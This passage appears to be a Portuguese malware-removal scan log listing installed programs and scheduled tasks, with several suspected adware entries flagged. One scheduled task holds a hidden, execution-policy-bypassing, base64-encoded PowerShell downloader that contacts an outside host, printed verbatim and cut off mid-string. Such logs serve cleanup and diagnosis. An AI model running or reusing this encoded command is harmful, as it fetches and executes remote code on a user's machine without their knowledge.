CertiInstaller 1.0.1.1 (HKLM\...\{4E637561-3FE5-4464-A2C1-8E0C44940601}_is1) (Version: 1.0.1.1 - Certisign)
CertiPlugin 1.0.0.3 (HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\{E74B2E92-1570-41FB-AB75-1A618DD3FCE3}_is1) (Version: 1.0.0.3 - Certisign)
Corel Graphics - Windows Shell Extension (HKLM\...\_{B865FDD4-E96E-4166-BB69-6E8C207E3E29}) (Version: 17.0.0.491 - Corel Corporation)
Corel Graphics - Windows Shell Extension (Version: 17.0.491 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - BR (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Capture (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Common (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Connect (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Custom Data (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Draw (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Filters (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - FontNav (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - IPM Content (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - IPM T (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - PHOTO-PAINT (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Photozoom Plugin (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Redist (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Setup Files (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - VBA (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - VideoBrowser (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Writing Tools (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 (HKLM\...\_{C5D9CECB-A66F-473F-B406-5C8C2DCA4DF0}) (Version: 17.0.0.491 - Corel Corporation)
CorelDRAW Graphics Suite X7 (Version: 17.0 - Corel Corporation) Hidden
Counter-Strike 1.6 (HKLM\...\{13B792AA-C078-43A4-8A3A-8B12D629940D}) (Version: 1.00.0000 - )
Driver 1.2 (HKLM\...\{BA56CD60-1D9F-4BE6-AC2F-B7C4A5437C35}) (Version: 1.2 - OEM)
DriverScanner (HKLM\...\{C2F8CA82-2BD9-4513-B2D1-08A47914C1DA}_is1) (Version: 4.0.16.0 - Uniblue Systems Ltd)
GamesDesktop 020.004010210 (HKLM\...\gmsd_br_004010210_is1) (Version: - GAMESDESKTOP) <==== ATENÇÃO
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
hppLaserJetService (Version: 001.003.000145 - Hewlett-Packard) Hidden
hppM1130M1210SeriesLaserJetService (Version: 001.003.00073 - Hewlett-Packard) Hidden
hppusgM1130M1210Series (Version: 1.0.0.2 - Hewlett-Packard) Hidden
Intel(R) Control Center (HKLM\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
JMicron Ethernet Adapter NDIS Driver (HKLM\...\{96DCEE2F-98EE-4F80-8C0F-7C04D1FB9D7F}) (Version: 6.0.17.1 - JMicron Technology Corp.)
JMicron Flash Media Controller Driver (HKLM\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.45.0 - JMicron Technology Corp.)
MarketResearch (Version: 130.0.374.000 - Hewlett-Packard) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (Português do Brasil) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1046) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2012 (HKLM\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation)
Mozilla Firefox 43.0.4 (x86 pt-BR) (HKLM\...\Mozilla Firefox 43.0.4 (x86 pt-BR)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla)
MyPC Backup (HKLM\...\OLBPre) (Version: - MyPC Backup) <==== ATENÇÃO
MyStart Toolbar (HKLM\...\mystarttb) (Version: 5.6.0.6 - Visicom Media Inc.)
OMNIKEY 3x21 PC/SC Driver (HKLM\...\{4DDEADA8-25B8-41CB-9989-8F16D50A8E9C}) (Version: 3.0.0.0 - OMNIKEY)
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (Version: 11.0.51108 - Microsoft Corporation) Hidden
PDF24 Creator 7.4.1 (HKLM\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org)
REALTEK Wireless LAN Driver (HKLM\...\{9D3D8C60-A55F-4fed-B2B9-173F09590E16}) (Version: 1.00.0148 - REALTEK Semiconductor Corp.)
SafeSign (HKLM\...\{2DF407D3-A8AD-4ACF-BFD5-5F7D42EC62FD}) (Version: 3.0.87 - A.E.T. Europe B.V.)
Setup (HKLM\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATENÇÃO
Spyware Terminator 2015 (HKLM\...\{56736259-613E-4A3B-B428-6235F2E76F44}_is1) (Version: 3.0.1.107 - Crawler Group)
System Healer (HKLM\...\SystemHealer) (Version: 4.1.0.0 - SystemHealer)
TrueSizer Wilcom e3.0 (HKLM\...\{E801DDB4-3CFC-496E-9E04-781EC2445D82}) (Version: 17.0.107.7371 - Wilcom)
TTWiFi 1.0.0.1 (HKLM\...\ttwifi) (Version: 1.0.0.1 - )
Unity Web Player (HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\UnityWebPlayer) (Version: 5.2.3f1 - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Wajam (HKLM\...\WajaNetEn) (Version: 1.58.1.37 (i1.0) - Wajam) <==== ATENÇÃO
Web Shield (HKLM\...\WebShield) (Version: 2.7.78 - Irrational Number Applications) <==== ATENÇÃO
Wilcom TrueSizer e3.0 (Version: 17.0.107.7371 - Wilcom) Hidden
WinRAR 5.30 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (Version: 11.0.51108 - Microsoft Corporation) Hidden
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
CustomCLSID: HKU\S-1-5-21-2498198735-273976222-1782081069-1001_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\vivo\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {04E6C6B9-5E64-4A3B-B053-A08A2D5EBD72} - \WinKit -> Nenhum Arquivo <==== ATENÇÃO
Task: {25E80772-FA16-4575-BEB3-42B9236D5592} - System32\Tasks\System Healer Task => C:\Program Files\SystemHealer\RescueMonitor.exe [2015-12-29] ()
Task: {29CB1D60-6F16-4D52-BB2B-596ACC99C71B} - System32\Tasks\Experience Extension => Rundll32.exe "C:\Users\vivo\AppData\Local\Experience Extension\xBin\ExperienceExtension.dll",#3 <==== ATENÇÃO
Task: {2E002453-331D-4898-B0C7-05A5C199C6C7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2015-12-16] (AVAST Software)
Task: {30B64B17-EA3C-42B7-A9F3-F3112E2BDE4A} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-06-30] (Avast Software s.r.o.)
Task: {31CE59EC-7FDA-43D3-B01B-981AB366ADDF} - System32\Tasks\System HealerStartUp => C:\Program Files\SystemHealer\SystemHealer.exe [2015-12-29] ()
Task: {31DDA842-77F3-453C-816D-710DA4A92BD1} - System32\Tasks\{BB405779-E6B9-4228-9601-C192C595A761} => C:\Program Files\Wilcom\ES2006\BIN\DESLOADR.EXE
Task: {4542C0FF-B4C3-400B-BD23-F85EC4B9B686} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-28] (Adobe Systems Incorporated)
Task: {4CF7494B-C02D-4B22-A11F-05E78F9D4EC3} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-10-19] (Piriform Ltd)
Task: {56F537F9-68FF-4711-8381-EC2A77AA799F} - \SwiftSearch Auto Updater 1.10.0.25 Core -> Nenhum Arquivo <==== ATENÇÃO
Task: {5B7D2B83-9863-42A0-AB66-FDF48E8B1084} - System32\Tasks\{04C6D611-6CC6-425B-98D9-3A498E722217} => pcalua.exe -a D:\Setup\Setup.exe -d D:\Setup
Task: {6AEF0C98-2CB4-4B67-8C70-4C977C7355CC} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {72F9DAB4-57C9-4CEC-982D-F4A4121EF7F8} - System32\Tasks\osTip => C:\ProgramData\WindowsMsg\osmsg.exe [2016-01-16] ()
Task: {8111ABC3-1BEB-44C4-ABB9-25529BFBAE76} - \SmartWeb Upgrade Trigger Task -> Nenhum Arquivo <==== ATENÇÃO
Task: {83628CDD-CBE6-4A1B-8C5A-4FBBEBBE1A18} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update -> Nenhum Arquivo <==== ATENÇÃO
Task: {8AE93B02-9EDC-45A1-8849-C79BF48AB0B6} - System32\Tasks\Inst_Rep => C:\Users\vivo\AppData\Local\Installer\Install_31302\ytdieamodc_amodc_inst.exe [2016-01-17] () <==== ATENÇÃO
Task: {AF97FBFD-0279-4CD7-A26F-74BA11ED883B} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {B22FA0E4-543B-47C0-8F7E-DE1714B40022} - System32\Tasks\Ancropafe => C:\ProgramData\Ancropafe\1.0.7.1\erwrolnu.exe [2016-01-17] ()
Task: {D0475699-763C-4711-A7DD-C7117465C2F3} - System32\Tasks\Advanced System~Protector => C:\Program Files\ASP\AspManager.exe [2015-11-20] ()
Task: {D622195C-D680-4FEA-9C56-59660C7C9E94} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {DBBD752C-9E61-4D20-9FAF-1766105CDFCA} - System32\Tasks\{ECC2E1FB-24B4-443B-BA80-46A62A0FFBD9} => C:\Program Files\Wilcom\ES2006\BIN\DESLOADR.EXE
Task: {E1CED1B4-5B07-4D72-99E8-D5C3C7576202} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {EA31FDFA-F4C6-49E5-8CC6-E0D8038C0080} - \Run_Bobby_Browser -> Nenhum Arquivo <==== ATENÇÃO
Task: {EC86346F-26A7-47E1-93D6-96D55F27DDF7} - System32\Tasks\{06FC4789-9338-4776-931B-1D12976D8FC0} => \CEBOLA_NET\Users\Public\programa\Wilcom 2006 SP4 Windows Seven\SP4_r2\WilcomES_SP4_r2.exe
Task: {ED595085-8E54-489D-A36C-ED8914801C59} - System32\Tasks\{0F7D0B47-7D0D-7A0C-0511-0D0C090E1108} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9AHQARAB6AE0ALQBCADEAMwBmAGsAdQAwAFkAYwBUAHkAYQB4AFMAeQBQAEcAeABzAHMAWQBzAGIAaABUAEYASABzAFYAMgBiAE0AWgBGAHEAdQBHAFYAOQBYAFIAUQBtAF8AZAAzAFkAcwBHAEYAVAA3AFMAYwBIAGUAQgBXAFoALQBDAEgAMQBEAGsAdQBhAGQAVgBfAFMAQwBZAHQANwAyAFgAVAAxAEQAdAAyAFYAZABHAEEAMgA4AFMAeAA0AHkANwBOAFMARgBRADMARAB0AHAASgBrAFQAbgA5AEkARwBoAEwAZwBHAGEAagA4AHgAUgBVADMAVgA2AHMAZgBwAHoAMABHAFgAVwBFAGMAawBDADIAMwB3ADMANgBKAHQAagBoADYAVgA5AFQAVABFAFEATABCAGkAZwBDAGgAVABJADgASgBjAHQAQwBIAE4AOQBoAEcAegBKAGMAcwBSAEUAcQBWAFgAdgB6AGwAcgB0AGsASAAyADEAagBFAGYAdgB2AEIAegBCAHEAeQBkAEsANAByAFEAcgBPADkATgBIAFgASwAtAHEAdgBNAGwAZgBLAHQAZwBzAHIAVwBQAGIAUABpAEYAMwBrAEQAagBYAEoANQBuAE4AbQBWAG0AUwBUAHQAbgBrAG4AeQA0AFgAOQBZAFAALQA4ADMARgBaAEIAWABMADgAdwBmAHQAZABuAHoANABLAEgATwBqADYAVQBNAEEASgBCADMAMABaAHAANwBhAE8AOQBlADcAUQBWAEsAegBTAGcAegBVAEEAYgBHAHUAMgBhAGEASAB6AHEAZwBkAGQANABaAEMAUgB0AFkAbwBSAFcAMwBqAGcANwBCAFgANQBrAGQALQBIAFkAYgBFAGcARABnADgAcABBADcAWgBpAFUAcwBWAGQAbQBCAEkAZABTADMATwB0AEUAWABGAFYAQgA0AGcALQBEAEsARwB2AHQAcAAzAEQAbQBVAEQARABsADQAVgBDAFAAegBOAFYAZABoAFYANQB3AGMAdAA3AE8AdQBlADAAVQBDADEAbAB5ADYAZgBVAFUAdQBGADgAMgBOAHQAQwA1AE8ARgBUAHcAegBLAHEAVABSAEEAegBHAEsAagBKAFIARABxAG0ALQA3AEYANQBUAFYAMgAtADkAZABiAGkAYwBKADQALQA0AFAARwBGAFQATQBIAHkASQBNAHIAbwAyAG0AcQBkAGUAVABsAEkAeABBAEUARgBiADIATwA4AFQATABwAEwAUwBvAFkAZABvAFUAZgBiADAASgBYAFkANwBTAEEAeQBmAGwAUABqADgAYQAtAFQAeQBTAFMARQA1AGgARABPAGwAXwBUAGMAMgBIAG4AcgBNAEgAMwBQAEIAdABoAGcAeQAyAEYAcwBzAE4AMQBxAFMASQBrAG4ARgByAEoATgB3AE0AegBKAC0AUQBlADkAYwBPAHEAcABjAGEATQBUAEIATgB5AEQASQBWAGwAdwBLAE0AbQBlAHQAbgBhAFgAbAB4AHEAbgBQAG0AeABNADMANwBGADgAYQBKAHUATgA0AFcASABPAEUAVQBhAFgAcABMAE4AQwBGAFYATABhAEIARgBSAHIAYgBaAHgAWQBFAHkAbwB0AHcAcgBNAEsAMABaAG0AQQBpADkAZwBWAHIAdwBGAGUATwBNAEQAQgBJADYAQwBRAGEANgB5ADkARgBWAHYAYgA3AHgAUwBHAFEANgBSAEUAVABMAEQAUQBGAGcASwB6AHAAcwBoAGUAcwBaAFgANwAyAEUAbwBoADUAbABrAG8AZwBEAC0AWgBnAEwAYwBCAFoAdQBQAEYAdgB5AGwAZgBnAHoANwBxAHQARQA2AEoASwBxAEUASwBYADkANABhAGUANQBkADgAOQBXAFkAZwBsAFgAawBxAEYASAB5AHIAUAB5AEMAQQB6AGoATQBhAEcANwBwAFQANABvAEQAdwB6AEsAcwBZAFEAcwBsAHcARQBzAHMAbgBYAHIAZwBoAHoAawBSAG8AZQB0AHAAcABOAEQAeAB2AEsAeAA5ADIAZQBpADEANQB4AFgATwBtAEgAMQBzADcAVABXAEgAQgBwAHMAZQA3AFcAZQA4AGEAWABJADQAXwBuAGUANABIAHIAOQA5ADUATAAwADYAegBxADAAdAA3ADYAQQBTAHUAWQBFAEUAcgBDAEsAaQBsAE0AWQBkAEQAdgBzADYAWgB3AHYANwBCAEcAVQBFAF8AdABaADUAdQBNAG0AUQB1AFkASgBzADQAbQA0AEIAWQB2AG8AdwBkAFgANQA3AGUASwBMAFIAXwBYAHIAYwBPADYANABQAGcAMQBtAEIARQBLAHAAXwBvAEgAJgBjAD0ATgAzAHMAZgAzAHgAawBxAHoANwBaAG4AbgBCAHMARAA4AGcAQgBqAGcATwBmAGwAMAA3AFMAXwBjADkANgBOAGQANQA4AHAAQwBWAGkAMABmAHIAMgBzAGcASwBYAEQAXwBlAEMAUQBfAFEAdABOADgAcABpAHAAUwBEAFgAWQBzAEwAZQBqAEIAdQBhAHkAbwBTAEwAVAB1AEgASgBrAFYAbQBEAGYAYgBtAEoAMwBHAHEAagAwAFUATwBsAFgAbQBpAEoAaABlAEoAZQBqAGwAaQBJAFEARwBtAGkAMgBKAFgAbwBxAFoAdABJAHkATAAtAFYAVwBJAHgAMgBOAFkALQBLAGkAZgBtAHUAcAA4ADAAMwBfAEcAMwB1AGoANAB1AEQAUQA0AGMAYwAxAFkASQB1AEoAdgB1AGoAdwBOAE0AbgAxAHAARwA4AGIAQgA0AC0AMQBXAEUAVwA1AHcASQAyAF8ANQBsAGcANABaAHQAZwBRAFUAMwBSAGgAdwBpAEwASwBrAGcAYgBEAGoAMgBxAEIAVQB6AEsAcABNADAAUQBWADkAZQBVADkARQBkAHgATQBfAHoAaAA1AHcANQBzAGEAbwBFAGkAZgBjAG8AMABLAFEAcAA3AE4AdABmAGsASQBXAFgAQQA1AGcAZABjADMAVwBxAF8AQQBkAGcAWgBEAHYAZgBqAHkAMQBsAHEAOABZAEQAOQByAFUAbwBaAHYAeABnADIASAB3AE0ARwA1AC0AdAByAEgAQgA4AE4AcgBjADkAYwBPAHAATQBpAFcAZwBHAHoAVQBpAFIAZQA5AGcAQgBOAHoAcgBTAEwAbQA1AEEANABnAFEAcAA3AEgAUgBYAEYALQB5AGMAVQB6AC0AOABIADMARQB6AGsAdwBOAEMAbQBIAFUAMwBpAGwAaABHAEgAMwBTAEEAUAB6AEEAVABoAHcATgBBADAARQBpAHkAdQA0AGcAWQBIADYAVwBXADUARwBYAGoAUQBPAHoAZAAtAG8AWAB5AEUAQwBDAFEAYQAwAHUAcQAwAEcAZQBZAFQAdgAwAEIAbwBUAFUAdQBQAEkAXwBpAFEAZwBCAHIAaAAwADgASwAtAC0ARwBxADUAbgA3AGYAVgBWAGYAdABrAC0AbQBMADAAYgBFAE8AaABBADYANgBBADAAWgByAHkAUQB5AHkAcgBrAHAANgBfAEsAMABPAG0AbABLADYAbwB0AGUAMAB1AGwAdgBnAEYALQAtAG8AMwBQAC0AOABJAEQAeABPAGUAagA3AEkAdwBmAF8AUwBJAFoASQBjADIAegBBAE4AQgBvAEYAMQB3ADYAVAA4AGkARgBSAEcARgB5AEgAUwBhAFUAdAAwADEAcQB1AE4AcQB4AFcASQBTAF8ATABfAGoAdAA4AEcAawBWAEwAdQBuAGgAbgB3AGMAVwA4AEIAaQA5AG0AdgBIAFIAQwBjAFoAegBhAHQATgAzAEUAOQB5ADEAWQBvAGsASgBFAGIAdABPAEoAMQAyAGMAawB1AGsAVgA0ADEASwA1ADcAVwBTAE0AaQBCAHUAQgBVAFUAYgBqAFMAbABVADgAMABYADMAZQBQAEwAZQB6AGQATwAtAEwAUwByAFoAVABaAHcAZwB5ADQANwBuAFgAeQBmADMAUgB1ADYAQwBwAGUAMQBfAGwAZQBTAGsAXwAxAEYALQBYAGIARgBhAE8ARAAxAGUAcgBzADkAQQBHAHYAawAxAHIAZwBBAE0ATQBzAFgAcABwAHoAcQBTAFgAeQBSADUAagBQADIATgBTAGwAWQBzAEoATABiADkAagBoAF8ATQBCAGUAWgBJAGcAZABIAEUAcABWAFQAYQA1AEYARABjAHYAcQBzAGYAawA3AEsAMwBwAEsAeQBpADgAQwBXAEgAbwBBAFAANAAxAHIATQB4AHkAVwAwAEMAZQBhAFEASAAzAC0AeQBtAEcASQBQAEsAMAB2AHcAawBPADAASwBFAGMAYQByAHIATwBKAFcATgBoAEMAVAAwAFkAVQAzAE8AWgBjAEkAQwBKAG0AVABBAG4AWgBoAFEALQBZAG0ATABVAHMAQwBSAEwAZgBpADIAcQBtAE0AZgBjADkAMQBoAEIASgBJADQAMABaAFIAQwBnAGQASABZAEYAawBsAG8AVABuAGMAMwBhAE0AeABKAFUAZwBkAFIAQwBFAE0ASgBmAE8ASABHADYASgBBAEkATQBCAHoAbABsADYAYQAtAGQAcwA4ADIAUABWADcAVQB3AG0ARgBGAEwAbQAyAHAAMQBrAEwASwBiADQAZwA1AEsAcwBBAE0ARQBYADMASwBWAGIAcgBjAHQAUgAyAHgAUwByAGUAZABPADMAWQAyAEQAVwB3AEIARwBZAE0AdwA4AHUANgBuADUAbwB2ADMAUQAtADgATAAmAHIAPQA1ADIANgAxADkANwA2ADAAOAAyADYANAA4ADkANgA2ADYAIgA7ACQAcwB0AHMAawA9ACIAewAwAEYANwBEADAAQgA0ADcALQA3AEQAMABEAC0ANwBBADAAQwAtADAANQAxADEALQAwAEQAMABDADAAOQAwAEUAMQAxADAAOAB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFUAVABKAFUAWQBUAFUATQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAb